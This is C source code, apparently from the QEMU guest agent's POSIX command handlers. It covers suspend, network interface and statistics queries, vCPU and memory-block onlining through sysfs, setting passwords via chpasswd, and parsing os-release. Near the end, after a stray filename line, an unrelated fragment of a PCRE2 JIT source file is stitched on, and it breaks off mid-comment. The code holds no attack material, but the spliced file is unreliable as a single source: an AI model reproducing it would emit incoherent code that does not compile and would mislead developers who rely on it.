                   "the requested suspend mode is not supported by the guest");
    } else if (local_err) {
        error_propagate(errp, local_err);
    }
}

void qmp_guest_suspend_disk(Error **errp)
{
    guest_suspend(SUSPEND_MODE_DISK, errp);
}

void qmp_guest_suspend_ram(Error **errp)
{
    guest_suspend(SUSPEND_MODE_RAM, errp);
}

void qmp_guest_suspend_hybrid(Error **errp)
{
    guest_suspend(SUSPEND_MODE_HYBRID, errp);
}

static GuestNetworkInterfaceList *
guest_find_interface(GuestNetworkInterfaceList *head,
                     const char *name)
{
    for (; head; head = head->next) {
        if (strcmp(head->value->name, name) == 0) {
            break;
        }
    }

    return head;
}

static int guest_get_network_stats(const char *name,
                                   GuestNetworkInterfaceStat *stats)
{
    int name_len;
    char const *devinfo = "/proc/net/dev";
    FILE *fp;
    char *line = NULL, *colon;
    size_t n = 0;

    fp = fopen(devinfo, "r");
    if (!fp) {
        return -1;
    }
    name_len = strlen(name);
    while (getline(&line, &n, fp) != -1) {
        long long dummy;
        long long rx_bytes;
        long long rx_packets;
        long long rx_errs;
        long long rx_dropped;
        long long tx_bytes;
        long long tx_packets;
        long long tx_errs;
        long long tx_dropped;
        char *trim_line;
        trim_line = g_strchug(line);
        if (trim_line[0] == '\0') {
            continue;
        }
        colon = strchr(trim_line, ':');
        if (!colon) {
            continue;
        }
        if (colon - name_len == trim_line &&
            strncmp(trim_line, name, name_len) == 0) {
            if (sscanf(colon + 1,
                "%lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld",
                  &rx_bytes, &rx_packets, &rx_errs, &rx_dropped,
                  &dummy, &dummy, &dummy, &dummy,
                  &tx_bytes, &tx_packets, &tx_errs, &tx_dropped,
                  &dummy, &dummy, &dummy, &dummy) != 16) {
                continue;
            }
            stats->rx_bytes = rx_bytes;
            stats->rx_packets = rx_packets;
            stats->rx_errs = rx_errs;
            stats->rx_dropped = rx_dropped;
            stats->tx_bytes = tx_bytes;
            stats->tx_packets = tx_packets;
            stats->tx_errs = tx_errs;
            stats->tx_dropped = tx_dropped;
            fclose(fp);
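            /* Counters for the requested interface parsed successfully:
             * free the getline() buffer and report success. */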
            g_free(line);
            return 0;
        }
    }

    fclose(fp);
    g_free(line);
    g_debug("/proc/net/dev: Interface '%s' not found", name);
    return -1;
}

/*
 * Build information about guest interfaces
 */
GuestNetworkInterfaceList *qmp_guest_network_get_interfaces(Error **errp)
{
    GuestNetworkInterfaceList *head = NULL, *cur_item = NULL;
    struct ifaddrs *ifap, *ifa;

    if (getifaddrs(&ifap) < 0) {
        error_setg_errno(errp, errno, "getifaddrs failed");
        goto error;
    }

    for (ifa = ifap; ifa; ifa = ifa->ifa_next) {
        GuestNetworkInterfaceList *info;
        GuestIpAddressList **address_list = NULL, *address_item = NULL;
        GuestNetworkInterfaceStat *interface_stat = NULL;
        char addr4[INET_ADDRSTRLEN];
        char addr6[INET6_ADDRSTRLEN];
        int sock;
        struct ifreq ifr;
        unsigned char *mac_addr;
        void *p;

        g_debug("Processing %s interface", ifa->ifa_name);

        info = guest_find_interface(head, ifa->ifa_name);

        if (!info) {
            info = g_malloc0(sizeof(*info));
            info->value = g_malloc0(sizeof(*info->value));
            info->value->name = g_strdup(ifa->ifa_name);

            if (!cur_item) {
                head = cur_item = info;
            } else {
                cur_item->next = info;
                cur_item = info;
            }
        }

        /* NOTE: the original condition also tested
         * "ifa->ifa_flags & SIOCGIFHWADDR", but SIOCGIFHWADDR is an ioctl
         * request code, not an interface flag, so that test was meaningless
         * and has been dropped. */
        if (!info->value->has_hardware_address) {
            /* we haven't obtained HW address yet */
            sock = socket(PF_INET, SOCK_STREAM, 0);
            if (sock == -1) {
                error_setg_errno(errp, errno, "failed to create socket");
                goto error;
            }

            memset(&ifr, 0, sizeof(ifr));
            pstrcpy(ifr.ifr_name, IF_NAMESIZE, info->value->name);
            if (ioctl(sock, SIOCGIFHWADDR, &ifr) == -1) {
                error_setg_errno(errp, errno,
                                 "failed to get MAC address of %s",
                                 ifa->ifa_name);
                close(sock);
                goto error;
            }

            close(sock);
            mac_addr = (unsigned char *) &ifr.ifr_hwaddr.sa_data;

            info->value->hardware_address =
                g_strdup_printf("%02x:%02x:%02x:%02x:%02x:%02x",
                                (int) mac_addr[0], (int) mac_addr[1],
                                (int) mac_addr[2], (int) mac_addr[3],
                                (int) mac_addr[4], (int) mac_addr[5]);

            info->value->has_hardware_address = true;
        }

        if (ifa->ifa_addr &&
            ifa->ifa_addr->sa_family == AF_INET) {
            /* interface with IPv4 address */
            p = &((struct sockaddr_in *)ifa->ifa_addr)->sin_addr;
            if (!inet_ntop(AF_INET, p, addr4, sizeof(addr4))) {
                error_setg_errno(errp, errno, "inet_ntop failed");
                goto error;
            }

            address_item = g_malloc0(sizeof(*address_item));
            address_item->value = g_malloc0(sizeof(*address_item->value));
            address_item->value->ip_address = g_strdup(addr4);
            address_item->value->ip_address_type = GUEST_IP_ADDRESS_TYPE_IPV4;

            if (ifa->ifa_netmask) {
                /* Count the number of set bits in netmask.
                 * This is safe as '1' and '0' cannot be shuffled in netmask. */
                p = &((struct sockaddr_in *)ifa->ifa_netmask)->sin_addr;
                address_item->value->prefix = ctpop32(((uint32_t *) p)[0]);
            }
        } else if (ifa->ifa_addr &&
                   ifa->ifa_addr->sa_family == AF_INET6) {
            /* interface with IPv6 address */
            p = &((struct sockaddr_in6 *)ifa->ifa_addr)->sin6_addr;
            if (!inet_ntop(AF_INET6, p, addr6, sizeof(addr6))) {
                error_setg_errno(errp, errno, "inet_ntop failed");
                goto error;
            }

            address_item = g_malloc0(sizeof(*address_item));
            address_item->value = g_malloc0(sizeof(*address_item->value));
            address_item->value->ip_address = g_strdup(addr6);
            address_item->value->ip_address_type = GUEST_IP_ADDRESS_TYPE_IPV6;

            if (ifa->ifa_netmask) {
                /* Count the number of set bits in netmask.
                 * This is safe as '1' and '0' cannot be shuffled in netmask.
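                 * (The resulting prefix length is the total popcount of
                 * the four 32-bit words of the mask.)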
*/ p = &((struct sockaddr_in6 *)ifa->ifa_netmask)->sin6_addr; address_item->value->prefix = ctpop32(((uint32_t *) p)[0]) + ctpop32(((uint32_t *) p)[1]) + ctpop32(((uint32_t *) p)[2]) + ctpop32(((uint32_t *) p)[3]); } } if (!address_item) { continue; } address_list = &info->value->ip_addresses; while (*address_list && (*address_list)->next) { address_list = &(*address_list)->next; } if (!*address_list) { *address_list = address_item; } else { (*address_list)->next = address_item; } info->value->has_ip_addresses = true; if (!info->value->has_statistics) { interface_stat = g_malloc0(sizeof(*interface_stat)); if (guest_get_network_stats(info->value->name, interface_stat) == -1) { info->value->has_statistics = false; g_free(interface_stat); } else { info->value->statistics = interface_stat; info->value->has_statistics = true; } } } freeifaddrs(ifap); return head; error: freeifaddrs(ifap); qapi_free_GuestNetworkInterfaceList(head); return NULL; } #define SYSCONF_EXACT(name, errp) sysconf_exact((name), #name, (errp)) static long sysconf_exact(int name, const char *name_str, Error **errp) { long ret; errno = 0; ret = sysconf(name); if (ret == -1) { if (errno == 0) { error_setg(errp, "sysconf(%s): value indefinite", name_str); } else { error_setg_errno(errp, errno, "sysconf(%s)", name_str); } } return ret; } /* Transfer online/offline status between @vcpu and the guest system. * * On input either @errp or *@errp must be NULL. * * In system-to-@vcpu direction, the following @vcpu fields are accessed: * - R: vcpu->logical_id * - W: vcpu->online * - W: vcpu->can_offline * * In @vcpu-to-system direction, the following @vcpu fields are accessed: * - R: vcpu->logical_id * - R: vcpu->online * * Written members remain unmodified on error. */ static void transfer_vcpu(GuestLogicalProcessor *vcpu, bool sys2vcpu, char *dirpath, Error **errp) { int fd; int res; int dirfd; static const char fn[] = "online"; dirfd = open(dirpath, O_RDONLY | O_DIRECTORY); if (dirfd == -1) { error_setg_errno(errp, errno, "open(\"%s\")", dirpath); return; } fd = openat(dirfd, fn, sys2vcpu ? 
O_RDONLY : O_RDWR); if (fd == -1) { if (errno != ENOENT) { error_setg_errno(errp, errno, "open(\"%s/%s\")", dirpath, fn); } else if (sys2vcpu) { vcpu->online = true; vcpu->can_offline = false; } else if (!vcpu->online) { error_setg(errp, "logical processor #%" PRId64 " can't be " "offlined", vcpu->logical_id); } /* otherwise pretend successful re-onlining */ } else { unsigned char status; res = pread(fd, &status, 1, 0); if (res == -1) { error_setg_errno(errp, errno, "pread(\"%s/%s\")", dirpath, fn); } else if (res == 0) { error_setg(errp, "pread(\"%s/%s\"): unexpected EOF", dirpath, fn); } else if (sys2vcpu) { vcpu->online = (status != '0'); vcpu->can_offline = true; } else if (vcpu->online != (status != '0')) { status = '0' + vcpu->online; if (pwrite(fd, &status, 1, 0) == -1) { error_setg_errno(errp, errno, "pwrite(\"%s/%s\")", dirpath, fn); } } /* otherwise pretend successful re-(on|off)-lining */ res = close(fd); g_assert(res == 0); } res = close(dirfd); g_assert(res == 0); } GuestLogicalProcessorList *qmp_guest_get_vcpus(Error **errp) { int64_t current; GuestLogicalProcessorList *head, **link; long sc_max; Error *local_err = NULL; current = 0; head = NULL; link = &head; sc_max = SYSCONF_EXACT(_SC_NPROCESSORS_CONF, &local_err); while (local_err == NULL && current < sc_max) { GuestLogicalProcessor *vcpu; GuestLogicalProcessorList *entry; int64_t id = current++; char *path = g_strdup_printf("/sys/devices/system/cpu/cpu%" PRId64 "/", id); if (g_file_test(path, G_FILE_TEST_EXISTS)) { vcpu = g_malloc0(sizeof *vcpu); vcpu->logical_id = id; vcpu->has_can_offline = true; /* lolspeak ftw */ transfer_vcpu(vcpu, true, path, &local_err); entry = g_malloc0(sizeof *entry); entry->value = vcpu; *link = entry; link = &entry->next; } g_free(path); } if (local_err == NULL) { /* there's no guest with zero VCPUs */ g_assert(head != NULL); return head; } qapi_free_GuestLogicalProcessorList(head); error_propagate(errp, local_err); return NULL; } int64_t qmp_guest_set_vcpus(GuestLogicalProcessorList *vcpus, Error **errp) { int64_t processed; Error *local_err = NULL; processed = 0; while (vcpus != NULL) { char *path = g_strdup_printf("/sys/devices/system/cpu/cpu%" PRId64 "/", vcpus->value->logical_id); transfer_vcpu(vcpus->value, false, path, &local_err); g_free(path); if (local_err != NULL) { break; } ++processed; vcpus = vcpus->next; } if (local_err != NULL) { if (processed == 0) { error_propagate(errp, local_err); } else { error_free(local_err); } } return processed; } void qmp_guest_set_user_password(const char *username, const char *password, bool crypted, Error **errp) { Error *local_err = NULL; char *passwd_path = NULL; pid_t pid; int status; int datafd[2] = { -1, -1 }; char *rawpasswddata = NULL; size_t rawpasswdlen; char *chpasswddata = NULL; size_t chpasswdlen; rawpasswddata = (char *)qbase64_decode(password, -1, &rawpasswdlen, errp); if (!rawpasswddata) { return; } rawpasswddata = g_renew(char, rawpasswddata, rawpasswdlen + 1); rawpasswddata[rawpasswdlen] = '\0'; if (strchr(rawpasswddata, '\n')) { error_setg(errp, "forbidden characters in raw password"); goto out; } if (strchr(username, '\n') || strchr(username, ':')) { error_setg(errp, "forbidden characters in username"); goto out; } chpasswddata = g_strdup_printf("%s:%s\n", username, rawpasswddata); chpasswdlen = strlen(chpasswddata); passwd_path = g_find_program_in_path("chpasswd"); if (!passwd_path) { error_setg(errp, "cannot find 'passwd' program in PATH"); goto out; } if (pipe(datafd) < 0) { error_setg(errp, "cannot create pipe FDs"); goto 
out; } pid = fork(); if (pid == 0) { close(datafd[1]); /* child */ setsid(); dup2(datafd[0], 0); reopen_fd_to_null(1); reopen_fd_to_null(2); if (crypted) { execle(passwd_path, "chpasswd", "-e", NULL, environ); } else { execle(passwd_path, "chpasswd", NULL, environ); } _exit(EXIT_FAILURE); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); goto out; } close(datafd[0]); datafd[0] = -1; if (qemu_write_full(datafd[1], chpasswddata, chpasswdlen) != chpasswdlen) { error_setg_errno(errp, errno, "cannot write new account password"); goto out; } close(datafd[1]); datafd[1] = -1; ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); goto out; } if (!WIFEXITED(status)) { error_setg(errp, "child process has terminated abnormally"); goto out; } if (WEXITSTATUS(status)) { error_setg(errp, "child process has failed to set user password"); goto out; } out: g_free(chpasswddata); g_free(rawpasswddata); g_free(passwd_path); if (datafd[0] != -1) { close(datafd[0]); } if (datafd[1] != -1) { close(datafd[1]); } } static void ga_read_sysfs_file(int dirfd, const char *pathname, char *buf, int size, Error **errp) { int fd; int res; errno = 0; fd = openat(dirfd, pathname, O_RDONLY); if (fd == -1) { error_setg_errno(errp, errno, "open sysfs file \"%s\"", pathname); return; } res = pread(fd, buf, size, 0); if (res == -1) { error_setg_errno(errp, errno, "pread sysfs file \"%s\"", pathname); } else if (res == 0) { error_setg(errp, "pread sysfs file \"%s\": unexpected EOF", pathname); } close(fd); } static void ga_write_sysfs_file(int dirfd, const char *pathname, const char *buf, int size, Error **errp) { int fd; errno = 0; fd = openat(dirfd, pathname, O_WRONLY); if (fd == -1) { error_setg_errno(errp, errno, "open sysfs file \"%s\"", pathname); return; } if (pwrite(fd, buf, size, 0) == -1) { error_setg_errno(errp, errno, "pwrite sysfs file \"%s\"", pathname); } close(fd); } /* Transfer online/offline status between @mem_blk and the guest system. * * On input either @errp or *@errp must be NULL. * * In system-to-@mem_blk direction, the following @mem_blk fields are accessed: * - R: mem_blk->phys_index * - W: mem_blk->online * - W: mem_blk->can_offline * * In @mem_blk-to-system direction, the following @mem_blk fields are accessed: * - R: mem_blk->phys_index * - R: mem_blk->online *- R: mem_blk->can_offline * Written members remain unmodified on error. */ static void transfer_memory_block(GuestMemoryBlock *mem_blk, bool sys2memblk, GuestMemoryBlockResponse *result, Error **errp) { char *dirpath; int dirfd; char *status; Error *local_err = NULL; if (!sys2memblk) { DIR *dp; if (!result) { error_setg(errp, "Internal error, 'result' should not be NULL"); return; } errno = 0; dp = opendir("/sys/devices/system/memory/"); /* if there is no 'memory' directory in sysfs, * we think this VM does not support online/offline memory block, * any other solution? 
*/ if (!dp) { if (errno == ENOENT) { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_NOT_SUPPORTED; } goto out1; } closedir(dp); } dirpath = g_strdup_printf("/sys/devices/system/memory/memory%" PRId64 "/", mem_blk->phys_index); dirfd = open(dirpath, O_RDONLY | O_DIRECTORY); if (dirfd == -1) { if (sys2memblk) { error_setg_errno(errp, errno, "open(\"%s\")", dirpath); } else { if (errno == ENOENT) { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_NOT_FOUND; } else { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_FAILED; } } g_free(dirpath); goto out1; } g_free(dirpath); status = g_malloc0(10); ga_read_sysfs_file(dirfd, "state", status, 10, &local_err); if (local_err) { /* treat with sysfs file that not exist in old kernel */ if (errno == ENOENT) { error_free(local_err); if (sys2memblk) { mem_blk->online = true; mem_blk->can_offline = false; } else if (!mem_blk->online) { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_NOT_SUPPORTED; } } else { if (sys2memblk) { error_propagate(errp, local_err); } else { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_FAILED; } } goto out2; } if (sys2memblk) { char removable = '0'; mem_blk->online = (strncmp(status, "online", 6) == 0); ga_read_sysfs_file(dirfd, "removable", &removable, 1, &local_err); if (local_err) { /* if no 'removable' file, it doesn't support offline mem blk */ if (errno == ENOENT) { error_free(local_err); mem_blk->can_offline = false; } else { error_propagate(errp, local_err); } } else { mem_blk->can_offline = (removable != '0'); } } else { if (mem_blk->online != (strncmp(status, "online", 6) == 0)) { const char *new_state = mem_blk->online ? "online" : "offline"; ga_write_sysfs_file(dirfd, "state", new_state, strlen(new_state), &local_err); if (local_err) { error_free(local_err); result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_FAILED; goto out2; } result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_SUCCESS; result->has_error_code = false; } /* otherwise pretend successful re-(on|off)-lining */ } g_free(status); close(dirfd); return; out2: g_free(status); close(dirfd); out1: if (!sys2memblk) { result->has_error_code = true; result->error_code = errno; } } GuestMemoryBlockList *qmp_guest_get_memory_blocks(Error **errp) { GuestMemoryBlockList *head, **link; Error *local_err = NULL; struct dirent *de; DIR *dp; head = NULL; link = &head; dp = opendir("/sys/devices/system/memory/"); if (!dp) { /* it's ok if this happens to be a system that doesn't expose * memory blocks via sysfs, but otherwise we should report * an error */ if (errno != ENOENT) { error_setg_errno(errp, errno, "Can't open directory" "\"/sys/devices/system/memory/\""); } return NULL; } /* Note: the phys_index of memory block may be discontinuous, * this is because a memblk is the unit of the Sparse Memory design, which * allows discontinuous memory ranges (ex. NUMA), so here we should * traverse the memory block directory. 
*/ while ((de = readdir(dp)) != NULL) { GuestMemoryBlock *mem_blk; GuestMemoryBlockList *entry; if ((strncmp(de->d_name, "memory", 6) != 0) || !(de->d_type & DT_DIR)) { continue; } mem_blk = g_malloc0(sizeof *mem_blk); /* The d_name is "memoryXXX", phys_index is block id, same as XXX */ mem_blk->phys_index = strtoul(&de->d_name[6], NULL, 10); mem_blk->has_can_offline = true; /* lolspeak ftw */ transfer_memory_block(mem_blk, true, NULL, &local_err); entry = g_malloc0(sizeof *entry); entry->value = mem_blk; *link = entry; link = &entry->next; } closedir(dp); if (local_err == NULL) { /* there's no guest with zero memory blocks */ if (head == NULL) { error_setg(errp, "guest reported zero memory blocks!"); } return head; } qapi_free_GuestMemoryBlockList(head); error_propagate(errp, local_err); return NULL; } GuestMemoryBlockResponseList * qmp_guest_set_memory_blocks(GuestMemoryBlockList *mem_blks, Error **errp) { GuestMemoryBlockResponseList *head, **link; Error *local_err = NULL; head = NULL; link = &head; while (mem_blks != NULL) { GuestMemoryBlockResponse *result; GuestMemoryBlockResponseList *entry; GuestMemoryBlock *current_mem_blk = mem_blks->value; result = g_malloc0(sizeof(*result)); result->phys_index = current_mem_blk->phys_index; transfer_memory_block(current_mem_blk, false, result, &local_err); if (local_err) { /* should never happen */ goto err; } entry = g_malloc0(sizeof *entry); entry->value = result; *link = entry; link = &entry->next; mem_blks = mem_blks->next; } return head; err: qapi_free_GuestMemoryBlockResponseList(head); error_propagate(errp, local_err); return NULL; } GuestMemoryBlockInfo *qmp_guest_get_memory_block_info(Error **errp) { Error *local_err = NULL; char *dirpath; int dirfd; char *buf; GuestMemoryBlockInfo *info; dirpath = g_strdup_printf("/sys/devices/system/memory/"); dirfd = open(dirpath, O_RDONLY | O_DIRECTORY); if (dirfd == -1) { error_setg_errno(errp, errno, "open(\"%s\")", dirpath); g_free(dirpath); return NULL; } g_free(dirpath); buf = g_malloc0(20); ga_read_sysfs_file(dirfd, "block_size_bytes", buf, 20, &local_err); close(dirfd); if (local_err) { g_free(buf); error_propagate(errp, local_err); return NULL; } info = g_new0(GuestMemoryBlockInfo, 1); info->size = strtol(buf, NULL, 16); /* the unit is bytes */ g_free(buf); return info; } #else /* defined(__linux__) */ void qmp_guest_suspend_disk(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } void qmp_guest_suspend_ram(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } void qmp_guest_suspend_hybrid(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } GuestNetworkInterfaceList *qmp_guest_network_get_interfaces(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestLogicalProcessorList *qmp_guest_get_vcpus(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } int64_t qmp_guest_set_vcpus(GuestLogicalProcessorList *vcpus, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return -1; } void qmp_guest_set_user_password(const char *username, const char *password, bool crypted, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } GuestMemoryBlockList *qmp_guest_get_memory_blocks(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestMemoryBlockResponseList * qmp_guest_set_memory_blocks(GuestMemoryBlockList *mem_blks, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestMemoryBlockInfo *qmp_guest_get_memory_block_info(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } #endif #if !defined(CONFIG_FSFREEZE) 
GuestFilesystemInfoList *qmp_guest_get_fsinfo(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestFsfreezeStatus qmp_guest_fsfreeze_status(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } int64_t qmp_guest_fsfreeze_freeze(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } int64_t qmp_guest_fsfreeze_freeze_list(bool has_mountpoints, strList *mountpoints, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } int64_t qmp_guest_fsfreeze_thaw(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } #endif /* CONFIG_FSFREEZE */ #if !defined(CONFIG_FSTRIM) GuestFilesystemTrimResponse * qmp_guest_fstrim(bool has_minimum, int64_t minimum, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } #endif /* add unsupported commands to the blacklist */ GList *ga_command_blacklist_init(GList *blacklist) { #if !defined(__linux__) { const char *list[] = { "guest-suspend-disk", "guest-suspend-ram", "guest-suspend-hybrid", "guest-network-get-interfaces", "guest-get-vcpus", "guest-set-vcpus", "guest-get-memory-blocks", "guest-set-memory-blocks", "guest-get-memory-block-size", NULL}; char **p = (char **)list; while (*p) { blacklist = g_list_append(blacklist, g_strdup(*p++)); } } #endif #if !defined(CONFIG_FSFREEZE) { const char *list[] = { "guest-get-fsinfo", "guest-fsfreeze-status", "guest-fsfreeze-freeze", "guest-fsfreeze-freeze-list", "guest-fsfreeze-thaw", "guest-get-fsinfo", NULL}; char **p = (char **)list; while (*p) { blacklist = g_list_append(blacklist, g_strdup(*p++)); } } #endif #if !defined(CONFIG_FSTRIM) blacklist = g_list_append(blacklist, g_strdup("guest-fstrim")); #endif return blacklist; } /* register init/cleanup routines for stateful command groups */ void ga_command_state_init(GAState *s, GACommandState *cs) { #if defined(CONFIG_FSFREEZE) ga_command_state_add(cs, NULL, guest_fsfreeze_cleanup); #endif } #ifdef HAVE_UTMPX #define QGA_MICRO_SECOND_TO_SECOND 1000000 static double ga_get_login_time(struct utmpx *user_info) { double seconds = (double)user_info->ut_tv.tv_sec; double useconds = (double)user_info->ut_tv.tv_usec; useconds /= QGA_MICRO_SECOND_TO_SECOND; return seconds + useconds; } GuestUserList *qmp_guest_get_users(Error **err) { GHashTable *cache = NULL; GuestUserList *head = NULL, *cur_item = NULL; struct utmpx *user_info = NULL; gpointer value = NULL; GuestUser *user = NULL; GuestUserList *item = NULL; double login_time = 0; cache = g_hash_table_new(g_str_hash, g_str_equal); setutxent(); for (;;) { user_info = getutxent(); if (user_info == NULL) { break; } else if (user_info->ut_type != USER_PROCESS) { continue; } else if (g_hash_table_contains(cache, user_info->ut_user)) { value = g_hash_table_lookup(cache, user_info->ut_user); user = (GuestUser *)value; login_time = ga_get_login_time(user_info); /* We're ensuring the earliest login time to be sent */ if (login_time < user->login_time) { user->login_time = login_time; } continue; } item = g_new0(GuestUserList, 1); item->value = g_new0(GuestUser, 1); item->value->user = g_strdup(user_info->ut_user); item->value->login_time = ga_get_login_time(user_info); g_hash_table_insert(cache, item->value->user, item->value); if (!cur_item) { head = cur_item = item; } else { cur_item->next = item; cur_item = item; } } endutxent(); g_hash_table_destroy(cache); return head; } #else GuestUserList *qmp_guest_get_users(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } #endif /* Replace escaped special characters with theire real values. 
The replacement * is done in place -- returned value is in the original string. */ static void ga_osrelease_replace_special(gchar *value) { gchar *p, *p2, quote; /* Trim the string at first space or semicolon if it is not enclosed in * single or double quotes. */ if ((value[0] != '"') || (value[0] == '\'')) { p = strchr(value, ' '); if (p != NULL) { *p = 0; } p = strchr(value, ';'); if (p != NULL) { *p = 0; } return; } quote = value[0]; p2 = value; p = value + 1; while (*p != 0) { if (*p == '\\') { p++; switch (*p) { case '$': case '\'': case '"': case '\\': case '`': break; default: /* Keep literal backslash followed by whatever is there */ p--; break; } } else if (*p == quote) { *p2 = 0; break; } *(p2++) = *(p++); } } static GKeyFile *ga_parse_osrelease(const char *fname) { gchar *content = NULL; gchar *content2 = NULL; GError *err = NULL; GKeyFile *keys = g_key_file_new(); const char *group = "[os-release]\n"; if (!g_file_get_contents(fname, &content, NULL, &err)) { slog("failed to read '%s', error: %s", fname, err->message); goto fail; } if (!g_utf8_validate(content, -1, NULL)) { slog("file is not utf-8 encoded: %s", fname); goto fail; } content2 = g_strdup_printf("%s%s", group, content); if (!g_key_file_load_from_data(keys, content2, -1, G_KEY_FILE_NONE, &err)) { slog("failed to parse file '%s', error: %s", fname, err->message); goto fail; } g_free(content); g_free(content2); return keys; fail: g_error_free(err); g_free(content); g_free(content2); g_key_file_free(keys); return NULL; } GuestOSInfo *qmp_guest_get_osinfo(Error **errp) { GuestOSInfo *info = NULL; struct utsname kinfo; GKeyFile *osrelease = NULL; const char *qga_os_release = g_getenv("QGA_OS_RELEASE"); info = g_new0(GuestOSInfo, 1); if (uname(&kinfo) != 0) { error_setg_errno(errp, errno, "uname failed"); } else { info->has_kernel_version = true; info->kernel_version = g_strdup(kinfo.version); info->has_kernel_release = true; info->kernel_release = g_strdup(kinfo.release); info->has_machine = true; info->machine = g_strdup(kinfo.machine); } if (qga_os_release != NULL) { osrelease = ga_parse_osrelease(qga_os_release); } else { osrelease = ga_parse_osrelease("/etc/os-release"); if (osrelease == NULL) { osrelease = ga_parse_osrelease("/usr/lib/os-release"); } } if (osrelease != NULL) { char *value; #define GET_FIELD(field, osfield) do { \ value = g_key_file_get_value(osrelease, "os-release", osfield, NULL); \ if (value != NULL) { \ ga_osrelease_replace_special(value); \ info->has_ ## field = true; \ info->field = value; \ } \ } while (0) GET_FIELD(id, "ID"); GET_FIELD(name, "NAME"); GET_FIELD(pretty_name, "PRETTY_NAME"); GET_FIELD(version, "VERSION"); GET_FIELD(version_id, "VERSION_ID"); GET_FIELD(variant, "VARIANT"); GET_FIELD(variant_id, "VARIANT_ID"); #undef GET_FIELD g_key_file_free(osrelease); } return info; }
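/*
 * Illustrative sketch (not part of the original file): ga_parse_osrelease()
 * above reuses GLib's INI parser for /etc/os-release by prepending a fake
 * "[os-release]" group header, since os-release is plain KEY=VALUE text with
 * no sections. A minimal standalone demo of the same trick, assuming only
 * GLib is available; the OSRELEASE_DEMO guard is hypothetical, added so this
 * snippet cannot collide with the code above.
 */
#ifdef OSRELEASE_DEMO
#include <glib.h>
#include <stdio.h>

int main(void)
{
    const char *content = "NAME=\"Demo OS\"\nVERSION_ID=1.0\n";
    gchar *wrapped = g_strdup_printf("[os-release]\n%s", content);
    GKeyFile *keys = g_key_file_new();

    if (g_key_file_load_from_data(keys, wrapped, -1, G_KEY_FILE_NONE, NULL)) {
        gchar *name = g_key_file_get_value(keys, "os-release", "NAME", NULL);
        /* still quoted here; the agent strips quotes in a separate pass */
        printf("NAME=%s\n", name);
        g_free(name);
    }
    g_key_file_free(keys);
    g_free(wrapped);
    return 0;
}
#endif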
940505.c
/************************************************* * Perl-Compatible Regular Expressions * *************************************************/ /* PCRE is a library of functions to support regular expressions whose syntax and semantics are as close as possible to those of the Perl 5 language. Written by Philip Hazel Original API code Copyright (c) 1997-2012 University of Cambridge New API code Copyright (c) 2016-2018 University of Cambridge ----------------------------------------------------------------------------- Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the University of Cambridge nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ----------------------------------------------------------------------------- */ #ifndef INCLUDED_FROM_PCRE2_JIT_COMPILE #error This file must be included from pcre2_jit_compile.c. #endif #ifdef SUPPORT_JIT static SLJIT_NOINLINE int jit_machine_stack_exec(jit_arguments *arguments, jit_function executable_func) { sljit_u8 local_space[MACHINE_STACK_SIZE]; struct sljit_stack local_stack; local_stack.min_start = local_space; local_stack.start = local_space; local_stack.end = local_space + MACHINE_STACK_SIZE; local_stack.top = local_space + MACHINE_STACK_SIZE; arguments->stack = &local_stack; return executable_func(arguments); } #endif /************************************************* * Do a JIT pattern match * *************************************************/ /* This function runs a JIT pattern match. 
